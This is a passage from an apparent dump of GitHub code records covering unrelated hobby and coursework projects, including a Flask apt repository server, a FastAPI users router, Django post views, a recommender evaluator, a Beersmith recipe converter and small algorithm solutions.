api_caller\n","repo_name":"zenoss/ZenPacks.zenoss.OpenStack","sub_path":"ZenPacks/zenoss/OpenStack/apiclients/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"30216761267","text":"# -*- coding: utf-8 -*-\n\n__all__ = ['AptRepository']\n__version__ = '0.1'\n__docformat__ = 'restructuredtext'\n\n\nfrom os import path as os_path\nfrom os import makedirs, listdir\nfrom flask import Flask, abort, jsonify, send_from_directory\n\nfrom multiprocessing import Process\n\n\nclass AptRepository(Flask):\n\n def __init__(self, root_dir, **kwargs):\n super(AptRepository, self).__init__(__name__, **kwargs)\n self.root_dir = root_dir\n self.add_route(\"/\")\n self.server= None\n\n def add_route(self, rule):\n self.add_url_rule(rule, view_func=self.list_files)\n\n def list_files(self, path):\n files = []\n realpath = os_path.join(self.root_dir, path)\n if os_path.exists(realpath):\n if os_path.isfile(realpath):\n return send_from_directory(self.root_dir, path, as_attachment=True)\n if os_path.isdir(realpath):\n for filename in listdir(realpath):\n files.append(filename)\n else:\n abort(404)\n return jsonify(files)\n\n def start_repository(self, **arguments):\n self.server = Process(target=self.run, kwargs=arguments)\n self.server.start()\n\n def stop_repository(self):\n self.server.terminate()\n self.server.join()\n","repo_name":"denysom/APTF","sub_path":"core/aptf/lib/AptRepository.py","file_name":"AptRepository.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24811830280","text":"import argparse\nimport random\nimport os\nimport tqdm\nimport shutil\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"DATA_DIR\", type=str, help=\"The directory of the dataset\")\nparser.add_argument(\"TARGET_DIR\", type=str, help=\"The target directory of the split\")\nparser.add_argument(\"--train_size\", default=0.7, type=float)\nparser.add_argument(\"--validation_size\", default=0.15, type=float)\n\nargs = parser.parse_args()\n\nif not 0 < args.train_size <= 1:\n raise argparse.ArgumentError(\"Train size must be a ratio [0-1]\")\n\n\ndef make_or_clear_dir(dir):\n if not os.path.exists(dir):\n os.mkdir(dir)\n 
else:\n for file in os.listdir(dir):\n filepath = os.path.join(dir, file)\n try:\n if os.path.isfile(dir):\n os.unlink(filepath)\n except Exception as e:\n print(e)\n\n\ndef copy_files(filenames, src_dir, dst_dir):\n for filename in tqdm.tqdm(filenames):\n orig_path = os.path.join(src_dir, filename)\n new_path = os.path.join(dst_dir, filename)\n shutil.copyfile(orig_path, new_path)\n\n\ndef extract_and_copy(files, name, split_num, src_dir, target_dir):\n dir_name = os.path.join(target_dir, name)\n make_or_clear_dir(dir_name)\n\n print(f\"Creating {split_num} {name} files in {dir_name}\")\n split_files = set(random.sample(files, k=split_num))\n copy_files(split_files, src_dir, dir_name)\n return files - split_files\n\n\nassert (\n 0 < args.train_size + args.validation_size <= 1\n), \"Invalid: 0 < train_ratio + validation_ratio <= 1 not satisfied\"\n\ndata_dir = args.DATA_DIR\ntarget_dir = args.TARGET_DIR\n\nfiles = set(\n [image_name for image_name in os.listdir(data_dir) if image_name.endswith(\"png\")]\n)\ntrain_num = int(len(files) * args.train_size)\nif args.train_size + args.validation_size == 1:\n validation_num = len(files) - train_num\nelse:\n validation_num = int(len(files) * args.validation_size)\n test_num = len(files) - train_num - validation_num\n\nremaining_files = extract_and_copy(files, \"train\", train_num, data_dir, target_dir)\nremaining_files = extract_and_copy(\n remaining_files, \"validation\", validation_num, data_dir, target_dir\n)\n\nif test_num > 0:\n extract_and_copy(remaining_files, \"test\", test_num, data_dir, target_dir)\n","repo_name":"mattdeak/street-signs","sub_path":"split_data.py","file_name":"split_data.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72061662967","text":"class Solution:\n def longest(self,nums):\n if len(nums)==0:\n return 0\n maxlen=1\n dp=[1]*len(nums)\n for i in range(len(nums)):\n templen=0\n for j in range(i):\n if nums[i]>nums[j]:\n templen=max(templen,dp[j])\n dp[i]=templen+1\n maxlen=max(maxlen,dp[i])\n return maxlen\n\n\nclass Solution2(object):\n def lengthOfLIS(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums:\n return 0\n maxlen = 1\n dp = [1] * len(nums)\n for i in range(1, len(nums)):\n for j in range(i):\n if nums[i] > nums[j] and dp[j] + 1 > dp[i]:\n dp[i] = dp[j] + 1\n maxlen = max(maxlen, dp[i])\n return maxlen\n","repo_name":"yinccc/leetcodeEveryDay","sub_path":"300-20190424-Longest increasting substring.py","file_name":"300-20190424-Longest increasting substring.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17924738955","text":"import sys\r\nimport os\r\nfrom src import src, to_json\r\nfrom cmp import cmp\r\n\r\nhelp = f\"\"\"\\\r\nCompare two or more sorce projects.\r\n Use:\r\n {(os.path.split(sys.argv[0])[1])} [ [ ...]]\r\n\"\"\"\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) < 4:\r\n print(help)\r\n exit(1)\r\n cfg = sys.argv[1]\r\n if not os.path.isfile(cfg):\r\n print(f\"Not found file \\\"{cfg}\\\"!\")\r\n exit(1)\r\n pjs = sys.argv[2:]\r\n for pj in pjs:\r\n if not os.path.isdir(pj):\r\n print(f\"Not found directory \\\"{pj}\\\"!\")\r\n exit(1)\r\n # srcs = [{\"source_location_root\":pj} for pj,i in zip(pjs,range(len(pjs)))]\r\n srcs = [src(cfg, pj, \"%s.src\" % (i+1)) for pj,i in zip(pjs,range(len(pjs)))]\r\n for i in range(len(srcs)):\r\n for j in 
range(i+1,len(srcs)):\r\n out_name = \"%s-%s.cmp\" % (i+1,j+1)\r\n print( out_name )\r\n to_json(cmp(srcs[i], srcs[j]), out_name)\r\n\r\n # print(srcs[i][\"source_location_root\"])\r\n\r\n\r\n","repo_name":"editorbank/srccmp","sub_path":"srccmp.py","file_name":"srccmp.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35493841728","text":"#!/usr/bin/python3\n'''\n\nCreates a POST request with urllib\n\n'''\n\n\nimport urllib.request\nimport urllib.parse\nimport sys\n\n\nif __name__ == \"__main__\":\n argv = sys.argv\n url = argv[1]\n email = argv[2]\n params = {\"email\": email}\n data = urllib.parse.urlencode(params)\n data = data.encode('ascii')\n request = urllib.request.Request(url, data)\n with urllib.request.urlopen(request) as response:\n print(response.read().decode('utf-8'))\n","repo_name":"valentino7504/alx-higher_level_programming","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8141940558","text":"import math\n\n\nclass Evaluator:\n\n def __init__(self, test):\n self.test = test\n self.test_rows = len(test)\n self.test_cols = len(test[0])\n self.TP = 0\n self.FP = 0\n self.FN = 0\n\n def __rmse(self, prediction_mat):\n count = 0\n sum_res = 0.0\n for i in range(self.test_rows):\n for j in range(self.test_cols):\n if self.test[i][j] > 0:\n sum_res += (prediction_mat[i][j] - self.test[i][j]) ** 2\n count += 1\n\n return math.sqrt(sum_res / count)\n\n def __mae(self, prediction_mat):\n count = 0\n sum_res = 0.0\n for i in range(self.test_rows):\n for j in range(self.test_cols):\n if self.test[i][j] > 0:\n sum_res += abs(prediction_mat[i][j] - self.test[i][j])\n count += 1\n\n return sum_res / count\n\n def __pre_calc(self, recomm_items):\n self.TP = 0\n self.FP = 0\n self.FN = 0\n\n for i in range(self.test_rows):\n for j in range(len(recomm_items[i])):\n if recomm_items[i][j] < self.test_cols and \\\n self.test[i][recomm_items[i][j]] > 0:\n self.TP += 1\n else:\n self.FP += 1\n\n for i in range(self.test_rows):\n for j in range(self.test_cols):\n if self.test[i][j] > 0 and j not in recomm_items[i]:\n self.FN += 1\n\n def __prec(self):\n return float(self.TP) / float(self.TP + self.FP)\n\n def __recall(self):\n return float(self.TP) / float(self.TP + self.FN)\n\n def __f1(self, prec, recall):\n if prec + recall == 0:\n f1 = 0\n else:\n f1 = 2 * prec * recall / (prec + recall)\n\n return f1\n\n def eval(self, recomm_items, prediction_mat, ret_obj=True):\n \"\"\"\n Calculates precision, recall, f1 score, RMSE and MAE.\n :param recomm_items: 2D array with recommended items (ids) for users\n :param prediction_mat: Matrix with all ratings predictions\n :param ret_obj: return object if True, if not return list\n [\n user0 -> [item_id0, item_id1, ...]\n ...\n ]\n :return:\n \"\"\"\n self.__pre_calc(recomm_items)\n prec = self.__prec()\n recall = self.__recall()\n f1 = self.__f1(prec, recall)\n rmse = self.__rmse(prediction_mat)\n mae = self.__mae(prediction_mat)\n\n if ret_obj:\n return {\n \"prec\": prec,\n \"recall\": recall,\n \"f1\": f1,\n \"rmse\": rmse,\n \"mae\": mae\n }\n else:\n return [prec, recall, f1, rmse, 
mae]\n","repo_name":"SkySurferOne/Recommender-System","sub_path":"src/main/Evaluator.py","file_name":"Evaluator.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29784532071","text":"from BTree import BTree,BTNode\ndef Level(bt,x): \t #解法1\n return _Level(bt.b,x,1)\ndef _Level(t,x,h):\n if t==None:\n return 0\t\t\t\t\t\t\t\t#空树不能找到该结点\n elif t.data==x:\n return h\t\t\t\t\t\t\t\t#根结点即为所找,返回其层次\n else:\n l=_Level(t.lchild,x,h+1)\t\t\t #在左子树中查找\n if l!=0:\n return l\t\t\t\t\t\t#左子树中找到了,返回其层次\n else:\n return _Level(t.rchild,x,h+1)\t #左子树中未找到,再在右子树中查找\n\n'''\ndef Level2(bt,x): \t#解法2\n return _Level2(bt.b,x)\ndef _Level2(t,x):\n if t==None:\t\t\t\t\t\t\t\t\t#空树不能找到该结点\n return 0\n if t.data==x:\t\t\t\t\t\t\t\t#根结点值为x\n return 1\n leftl=0 if t.lchild==None else _Level2(t.lchild,x)\n rightl=0 if t.rchild==None else _Level2(t.rchild,x)\n if leftl<1 and rightl<1:\t\t\t\t\t\t#左右子树都没有找到,返回0\n return 0;\n return max(leftl,rightl)+1\t\t\t\t#返回左右子树中最大层次+1\n'''\n\n#主程序\nb=BTNode('A')\np1=BTNode('B')\np2=BTNode('C')\np3=BTNode('D')\np4=BTNode('E')\np5=BTNode('F')\np6=BTNode('G')\nb.lchild=p1\nb.rchild=p2\np1.lchild=p3\np3.rchild=p6\np2.lchild=p4\np2.rchild=p5\nbt=BTree()\nbt.SetRoot(b)\nprint(\"bt:\",end=' ');print(bt.DispBTree())\nx='C'\nprint(x+\"的层次=%d\" %(Level(bt,x)))\nx='F'\nprint(x+\"的层次=%d\" %(Level(bt,x)))\nx='X'\nprint(x+\"的层次=%d\" %(Level(bt,x)))\n\n","repo_name":"renyumeng1/sound-code","sub_path":"ch6/Exam6-12.py","file_name":"Exam6-12.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"3241422375","text":"import crud\nimport openpyxl\nfrom fastapi import APIRouter, Depends, HTTPException, UploadFile, File, Request, Header\nfrom fastapi.security.api_key import APIKey\nfrom fastapi.responses import FileResponse\nfrom os import getcwd\nfrom schemas.users_schema import User, row_to_schema\nfrom schemas.other_schemas import UserIdentification, IdList, UserUpdate\nfrom db.db import get_db\nfrom sqlalchemy.orm import Session\nfrom core import utils\nfrom core import responses\nfrom core.config import settings\nfrom core.messages import messages\nfrom core import auth\nfrom typing import List, Optional, Union\nfrom db.enums import UserStatusEnum, RoleEnum\nfrom api import requests\n\n\n# crear router\n\nusers_router = APIRouter()\nauth_key = 'Authorization' \n\n# ------------------------------ POST ------------------------------------------------\n@users_router.post('/login', tags=['users'])\ndef login():\n \"\"\"\n Inicia sesión y obtiene el token del servicio de autenticación\n \"\"\"\n response = requests.login()\n return response\n\n\n@users_router.post('/get_project_info_by_student', tags=['users'])\ndef get_project_info_by_student(identification: UserIdentification, db: Session = Depends(get_db), \n api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Obtiene información del proyecto donde está inscrito un estudiante\n \"\"\"\n project_info = crud.users.get_project_info_by_student(identification.identification, db)\n if project_info['name'] is None:\n project_info['task_list'] = []\n else:\n project_info['task_list'] = crud.tasks.get_tasks_by_student(identification.identification, db)\n db.close()\n return project_info\n \n\n@users_router.post('/get_user', tags=['users'])\ndef get_user(identification: UserIdentification, db: Session = Depends(get_db)):\n \"\"\"\n Obtiene los datos de 
un usuario a partir de la cédula\n \"\"\"\n user = crud.users.get_user_info_by_identification(identification.identification, db)\n db.close()\n return user\n\n@users_router.post('/enroll_students_in_project/{project_id}', tags=['users'])\ndef enroll_students_in_project(id_students: List[int], project_id: int, db: Session = Depends(get_db), \n api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Inscribe a los estudiantes seleccionados en un proyecto a partir de una lista de ids\n \"\"\"\n user = crud.users.enroll_students_in_project(id_students, project_id, db)\n db.close()\n return user\n\n\n@users_router.post('/create_student', tags=['users'])\ndef create_student(user: User, request: Request, db: Session = Depends(get_db), api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Crear un estudiante\n \"\"\"\n authorization = request.headers.get(auth_key)\n response = crud.users.create_user_with_username(user, RoleEnum.Student, db, authorization)\n db.close()\n return response\n\n\n\n@users_router.post('/create_students', tags=['users'])\ndef create_students(users: List[User], request: Request, db: Session = Depends(get_db), api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Crear estudiantes a partir de una lista\n \"\"\"\n authorization = request.headers.get(auth_key)\n response = crud.users.create_users_with_username(users, RoleEnum.Student, db, authorization)\n db.close()\n return response\n\n\n@users_router.post('/create_tutor', tags=['users'])\ndef create_tutor(user: User, request: Request, db: Session = Depends(get_db), api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Crear un tutor\n \"\"\"\n authorization = request.headers.get(auth_key)\n response = crud.users.create_user_with_username(user, RoleEnum.Tutor, db, authorization)\n db.close()\n return response\n\n\n\n@users_router.post('/create_tutors', tags=['users'])\ndef create_tutors(users: List[User], request: Request, db: Session = Depends(get_db), api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Crear tutores a partir de una lista\n \"\"\"\n authorization = request.headers.get(auth_key)\n response = crud.users.create_users_with_username(users, RoleEnum.Tutor, db, authorization)\n db.close()\n return response\n\n@users_router.post('/create_students_from_file', tags=['users'])\nasync def upload_file(file: UploadFile=File(...), db: Session = Depends(get_db)\n , api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Crea estudiantes a partir de un archivo\n \"\"\"\n # with open(getcwd() + file.filename, 'wb') as myfile:\n if not utils.is_valid_file(file.filename):\n raise HTTPException(400, detail=messages['invalid_document_type']) \n\n # save file\n upload_path = utils.get_upload_path(file.filename)\n with open(upload_path, 'wb') as myfile:\n content = await file.read()\n myfile.write(content)\n myfile.close()\n\n schema_list = utils.get_schema_list_from_file(upload_path, row_to_schema, settings.USERS_FILE_FORMAT)\n response = crud.users.create_users_from_list(schema_list, 'Estudiante', db)\n db.close()\n return response\n\n\n\n@users_router.post('/create_tutors_from_file', tags=['users'])\nasync def upload_file(file: UploadFile=File(...), db: Session = Depends(get_db)\n , api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Crea estudiantes a partir de un archivo\n \"\"\"\n # with open(getcwd() + file.filename, 'wb') as myfile:\n if not utils.is_valid_file(file.filename):\n raise HTTPException(400, detail=messages['invalid_document_type']) \n\n # save file\n upload_path = 
utils.get_upload_path(file.filename)\n with open(upload_path, 'wb') as myfile:\n content = await file.read()\n myfile.write(content)\n myfile.close()\n\n schema_list = utils.get_schema_list_from_file(upload_path, row_to_schema, settings.USERS_FILE_FORMAT)\n response = crud.users.create_users_from_list(schema_list, 'Tutor', db)\n db.close()\n return response\n\n\n# ------------------------------ UPDATE ------------------------------------------------\n\n@users_router.put('/update_user', tags=['users'])\ndef update_user(user: UserUpdate, db: Session = Depends(get_db), \n api_key: APIKey = Depends(auth.get_api_key), authorization: str = Header(default=None)):\n \"\"\"\n Actualiza los datos de un usuario \n \"\"\"\n users = crud.users.update_user(user, authorization, db)\n db.close()\n return responses.USER_UPDATED_SUCCESS\n\n\n@users_router.put('/delete_student_project', tags=['users'])\ndef delete_student_project(identification: UserIdentification, db: Session = Depends(get_db), \n api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Saca al estudiante del proyecto actual\n \"\"\"\n response = crud.users.delete_student_project(identification.identification, db)\n db.close()\n return responses.USER_UPDATED_SUCCESS\n\n\n@users_router.put('/delete_students_project', tags=['users'])\ndef delete_students_project(id_list: IdList, db: Session = Depends(get_db), \n api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Saca al estudiante del proyecto actual\n \"\"\"\n response = crud.users.delete_students_project(id_list.id_list, db)\n db.close()\n return response\n\n\n@users_router.put('/update_student_status/{status}', tags=['users'])\ndef update_student_status(identification: UserIdentification, status: UserStatusEnum, db: Session = Depends(get_db), \n api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n Actualiza el estatus de un estudiante\n \"\"\"\n users = crud.users.update_student_status(identification.identification, status, db)\n db.close()\n return responses.USER_UPDATED_SUCCESS\n\n\n@users_router.put('/update_students_status/{status}', tags=['users'])\ndef update_students_status(id_list: IdList, status: UserStatusEnum, db: Session = Depends(get_db),\n api_key: APIKey = Depends(auth.get_api_key)):\n \"\"\"\n \n \"\"\"\n response = crud.users.update_students_status(id_list.id_list, status, db)\n db.close()\n return response\n\n# ------------------------------ GET ------------------------------------------------\n\n@users_router.get('/get_students')\n@users_router.get('/get_students/{status}', tags=['users'])\ndef get_students(status: Optional[str] = None, db: Session = Depends(get_db)):\n \"\"\"\n Obtener una lista de estudiantes con los siguientes campos\n Cédula, nombre, apellido, horas, proyecto, fecha de aprobación\n \"\"\"\n if status == None:\n users = crud.users.get_students(db)\n elif status == 'No-asignado': \n users = crud.users.get_students_without_project(db)\n elif status == 'Asignado':\n users = crud.users.get_students_with_project(db)\n elif status == 'Aprobado':\n users = crud.users.get_approved_students(db)\n elif status == 'Activo' or status == 'Inactivo' or status == 'Graduado':\n users = crud.users.get_students_by_status(db, status)\n else:\n raise HTTPException(status_code=400, detail=messages['incorrect_status'])\n db.close()\n return users\n\n\n\n\n@users_router.get('/get_students_without_project', tags=['users'])\ndef get_students_without_project(db: Session = Depends(get_db)):\n \"\"\"\n Obtener una lista de estudiantes que están activos pero\n no tienen 
proyecto asignado\n \"\"\"\n users = crud.users.get_students_without_project(db)\n db.close()\n return users\n\n\n\n\n\n@users_router.get('/get_tutors', tags=['users'])\ndef get_tutors(db: Session = Depends(get_db)):\n \"\"\"\n Obtiene la lista de tutores\n \"\"\"\n users = crud.users.get_tutors(db)\n db.close()\n return users\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"angelavts/Servicio-comunitario-API","sub_path":"api/users_router.py","file_name":"users_router.py","file_ext":"py","file_size_in_byte":9544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42484958046","text":"from django.contrib.auth.decorators import login_required\r\nfrom django.http import HttpResponseRedirect, HttpResponse\r\nfrom django.shortcuts import render, get_object_or_404\r\n# Create your views here.\r\nfrom django.template import loader\r\nfrom django.urls import reverse\r\nfrom massage.forms import newpost\r\nfrom massage.models import Post, viewer\r\n\r\n\r\n############################################\r\n\r\n@login_required\r\ndef Post_view(request, post_id):\r\n post = get_object_or_404(Post, pk=post_id)\r\n prof = request.user.profile\r\n try:\r\n view = viewer.objects.get(prof=prof, post=post)\r\n except:\r\n view = None\r\n if view is None and prof != post.prof:\r\n view = viewer.objects.create(post=post, prof=prof)\r\n post.views += 1\r\n pass\r\n if request.method == 'POST':\r\n comment = request.POST.get('comment')\r\n like = request.POST.get('like')\r\n if view is not None:\r\n view.comment = comment\r\n view.save()\r\n if like is True:\r\n post.like += 1\r\n post.save()\r\n context = {\r\n 'post': post\r\n }\r\n return HttpResponseRedirect(reverse(viewname='massage:post_list'))\r\n else:\r\n if view != None:\r\n view.save()\r\n post.save()\r\n context = {\r\n 'post': post\r\n }\r\n return render(request, 'massage/posts_view.html', context)\r\n\r\n############################################\r\n\r\n\r\ndef Post_list(request):\r\n posts = Post.objects.all().order_by('share_date')\r\n context = {\r\n 'posts': posts,\r\n }\r\n return render(request, 'massage/posts_list.html', context)\r\n\r\n############################################\r\n\r\n\r\ndef Post_data(request, post_id):\r\n post = get_object_or_404(Post, pk=post_id)\r\n data = post.data\r\n context = {\r\n 'data': data,\r\n 'post': post\r\n }\r\n return render(request, 'massage/post_data.html', context)\r\n\r\n############################################\r\n\r\n\r\n@login_required\r\ndef New_post(request):\r\n if request.method == 'POST':\r\n post = newpost(request.POST, request.FILES)\r\n if post.is_valid():\r\n new_post = post.save(commit=False)\r\n new_post.prof = request.user.profile\r\n new_post.save()\r\n return HttpResponseRedirect(reverse('massage:Post_view', kwargs={'post_id': new_post.pk}))\r\n\r\n context = {\r\n 'post': post\r\n }\r\n else:\r\n post = newpost()\r\n context = {\r\n 'post': post\r\n }\r\n return render(request, 'massage/newpost.html', context)\r\n\r\n############################################\r\n\r\n\r\ndef Mypost(request):\r\n post = Post.objects.filter(prof=request.user.profile)\r\n context = {\r\n \"post\": post\r\n }\r\n return render(request, \"massage/mypost.html\", 
context)\r\n############################################\r\n","repo_name":"hamedpython2020/MyMassagerss","sub_path":"massage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2020347983","text":"class intersection():\n\tdef __init__(self,startNum):\n\t\tself.startNum=startNum\n\t\tself.roadList={}\n\t\tself.waitingList=[]\n\tdef addRoad(self,roadName,nextInter,length):\n\t\tself.roadList[roadName]={\"nextInter\":nextInter,\"length\":length}\n\tdef getRoadInfo(self, roadName):\n\t\ttry:\n\t\t\treturn self.roadList[roadName]\n\t\texcept:\n\t\t\treturn None\n\tdef addWaitingList(self, carObj):\n\t\tself.waitingList.append(carObj)\n\n\nclass car():\n\tdef __init__(self,startRoadName,roadDict,travelList):\n\t\tself.start=roadDict[startRoadName]['inter']\n\t\tself.travelList=travelList\n\t\ttotalDist=0\n\t\tfor i in travelList:\n\t\t\ttotalDist+=roadDict[i][\"length\"]\n\t\tself.travelDist=totalDist\n\t\tself.available=False\n\n\ndef readFile(filePath):\n\twith open(filePath, \"r\") as f:\n\t\treturn f.readlines()\n\ndef addWaitingList():\n\tfor i in carObjList:\n\t\tinterObjList[i.start].addWaitingList(i)\n\ndef findAvailableCar():\n\tfor i in carObjList:\n\t\tif simSecs>=i.travelDist:\n\t\t\ti.available=True\n\n\ndef interpreter(totalTxt):\n\tglobal simSecs\n\tglobal interObjList\n\tglobal carObjList\n\tglobal roadDict\n\tinterQuan=0\n\troadQuan=0\n\tcarQuan=0\n\tscore=0\n\tinterObjList={}\n\tcarObjList=[]\n\troadDict={}\n\n\tfor idx, line in enumerate(totalTxt):\n\t\tif idx==0:\n\t\t\tstrList=line.split()\n\t\t\tsimSecs=int(strList[0])\n\t\t\tinterQuan=int(strList[1])\n\t\t\troadQuan=int(strList[2])\n\t\t\tcarQuan=int(strList[3])\n\t\t\tscore=int(strList[4])\n\t\tif idx>=1 and idx<=roadQuan:\n\t\t\tstrList=line.split()\n\t\t\tstartNum=int(strList[0])\n\t\t\tendNum=int(strList[1])\n\t\t\ttry:\n\t\t\t\tif interObjList[startNum]:\n\t\t\t\t\tinterObjList[startNum].addRoad(strList[2],int(strList[1]),int(strList[3]))\n\t\t\texcept:\n\t\t\t\tobj=intersection(startNum)\n\t\t\t\tobj.addRoad(strList[2],int(strList[1]),int(strList[3]))\n\t\t\t\tinterObjList[startNum]=obj\n\t\t\troadDict[strList[2]]={\"inter\":int(strList[1]),\"length\":int(strList[3])}\n\t\tif idx>roadQuan:\n\t\t\tstrList=line.split()\n\t\t\tobj=car(strList[1],roadDict,strList[:1:-1][::-1])\n\t\t\tcarObjList.append(obj)\n\taddWaitingList()\n\tfindAvailableCar()\n\n\n\ntotalTxt=readFile('a.txt')\ninterpreter(totalTxt)\n\n\n\nprint(interObjList[0].waitingList[0])\n\n\n\"\"\"\nglobal simSecs\nglobal interObjList\nglobal carObjList\nglobal roadDict\n\"\"\"","repo_name":"twyunting/HashCode2021","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41008210059","text":"# a=[9,3,5,6]\n# summa=sum(a)\n# import numpy as np\n# l = [1,2,3,4,5]\n# print(\"Summa:\",summa)\n# print(\"Reizinājums:\",np.prod(l))\n# \n\n# Vārds = 'Alberts'[::-1]\n# print(Vārds)\n\npatskani = ['a','ā','e','ē','u','ū','i','ī','o']\nteikums = input(\"Ievadiet tekstu: \")\ncount = 0\nfor letter in teikums:\n if letter in patskani:\n count += 1\nprint(count)","repo_name":"AnnaLaz/07.12.21","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} 
+{"seq_id":"23864657076","text":"#!/usr/bin/python\n\"\"\"\nReads a beersmith recipe and creates stages file\nRuns basic checks against controllers\n\n\"\"\"\n\nimport sys\nsys.path.append(\"/home/mikael/workspace/hoppity/src\")\nimport ctrl\nimport argparse\nimport recipeReader\nimport json\nimport equipment\nimport os\nimport xml.etree.ElementTree\nimport checker\nimport logging\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Load files to S3')\n parser.add_argument('-i', '--inputfile', default=None, help='Input beersmith file')\n parser.add_argument('-o', '--outputfile', default=None, help='Output stages file')\n parser.add_argument('-d', '--debug', action='store_true', help='Set log level to debug')\n parser.add_argument('-e', '--error', action='store_true', help='Set log level to debug')\n args = parser.parse_args()\n\n if args.debug:\n loglevel = logging.DEBUG\n elif args.error:\n loglevel = logging.ERROR\n else:\n loglevel = logging.INFO\n\n\n logging.basicConfig(format='%(asctime)s %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=loglevel,\n stream=sys.stdout)\n\n if args.inputfile is None:\n inf = sys.stdin\n else:\n #testing\n print(\"==================================> {}\".format(args.inputfile))\n \n try:\n inf = open(args.inputfile, 'r')\n except:\n print(\"Can not open inputfile\")\n sys.exit(1)\n if args.outputfile is None:\n outf = sys.stdout\n else:\n try:\n outf = open(args.outputfile, 'w')\n except:\n print(\"Can not open outputfile {}\".format(args.outputfile))\n sys.exit(1)\n bsmxIn = inf.read()\n bsmxStr = bsmxIn.replace('&', 'AMP')\n inf.close()\n \n e = xml.etree.ElementTree.fromstring(bsmxStr)\n equipmentName = e.find('Data').find('Recipe').find('F_R_EQUIPMENT').find('F_E_NAME').text\n print('Equipment: {}'.format(equipmentName))\n mypath = os.path.dirname(os.path.realpath(__file__))\n availableEquipment = equipment.allEquipment(mypath + '/equipment/*.yaml')\n myEquipment = availableEquipment.get(equipmentName)\n controllers = ctrl.setupControllers(False, True, True, myEquipment)\n\n bsmxObj = recipeReader.bsmxStages(bsmxStr, controllers)\n stagesStr = bsmxObj.getStages()\n if stagesStr is None:\n print('Error: Invalid recipe')\n sys.exit(1)\n\n equipmentchecker = checker.equipment(controllers, stagesStr)\n if not equipmentchecker.check():\n print(\"Error: equipment vs recipe validation failed\")\n sys.exit(1)\n\n # Debug print the dispensers\n #hops = bsmxObj.ingredientsHops()\n #misc = bsmxObj.ingredientsMisc()\n\n json.dump(stagesStr, outf, sort_keys=True,\n indent=2, separators=(',', ': '))\n outf.close()\n bsmxObj.compareStrikeTemp()\n\n","repo_name":"cloudymike/hopitty","sub_path":"src/bsmx2stages.py","file_name":"bsmx2stages.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37123285088","text":"\"\"\"\nImplementation of Dijkstra Algorithm using Textbook Pseudocode.\n\"\"\"\nimport math\nimport time\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n\nclass Graph:\n \"\"\"\n Analyzes adjacency matrices and implements Dikjstra's Algorithm.\n\n Attributes:\n graph: an adjacency matrix representing a graph with weighted edges.\n vertices: an integer representing the number of vertices in the graph.\n \"\"\"\n\n INF = math.inf\n\n def __init__(self, graph):\n \"\"\"\n Initialize the attributes of the class.\n \"\"\"\n self.graph = graph\n self.vertices = len(graph)\n\n def get_weights(self, v_i, v_j):\n 
